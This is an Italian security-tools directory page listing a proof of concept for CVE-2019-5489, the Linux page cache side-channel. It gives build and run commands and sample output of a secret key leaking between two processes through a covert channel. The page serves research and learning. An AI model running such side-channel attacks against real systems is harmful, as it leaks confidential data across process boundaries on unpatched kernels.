Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-5489 — Attacchi side-channel della cache di pagina (CVE-2019-5489) proof of concept per Linux | Kitploit
Strumenti/GitHubGitHub/mmxsrup/cve-2019-5489
Analisi delle VulnerabilitàExploitRaccolta InformazioniPaper e RicercaApprendimento e FormazioneBinary Exploitation
GitHubmmxsrup/cve-2019-5489

CVE-2019-5489

Attacchi side-channel della cache di pagina (CVE-2019-5489) proof of concept per Linux

Vedi Repository
10324 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE 2019-5489

Questo repository contiene un proof of concept per Linux degli attacchi side-channel della cache delle pagine (CVE-2019-5489).

Per valutare il side-channel della cache delle pagine, ho implementato un canale nascosto tra due processi. Il processo mittente invia dati riservati a un processo ricevente tramite il side-channel della cache delle pagine. Gli attacchi alla cache delle pagine sono stati mitigati in Linux Kernel 5.0 e successivi, quindi questa PoC funzionerà solo prima di Linux Kernel 5.0.

NOTA: Ho testato il funzionamento su Ubuntu 18.04, Linux 4.15.0-70.

Compilazione

Esegui il comando seguente.

root@kitploit:~
git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make

Esecuzione

Disabilita lo spazio di swap per facilitare l'attacco.

root@kitploit:~
swapoff -a

Terminale 1

All'inizio, esegui il comando seguente sul terminale 1.

root@kitploit:~
make run-sender

Terminale 2

Dopo che sending 1th character ... viene visualizzato sul terminale 1, esegui il comando seguente.

root@kitploit:~
make run-receiver

Output

Se l'esecuzione ha successo, verrà visualizzato quanto segue.
Questo mostra che la chiave è stata inviata dal processo Mittente al processo Ricevente tramite il side-channel della cache delle pagine.

Terminale 1

root@kitploit:~
LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...

Terminale 2

root@kitploit:~
LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord

Riferimenti

  • Daniel Gruss et al. Page cache attacks [CCS 19]
Scarica lo strumento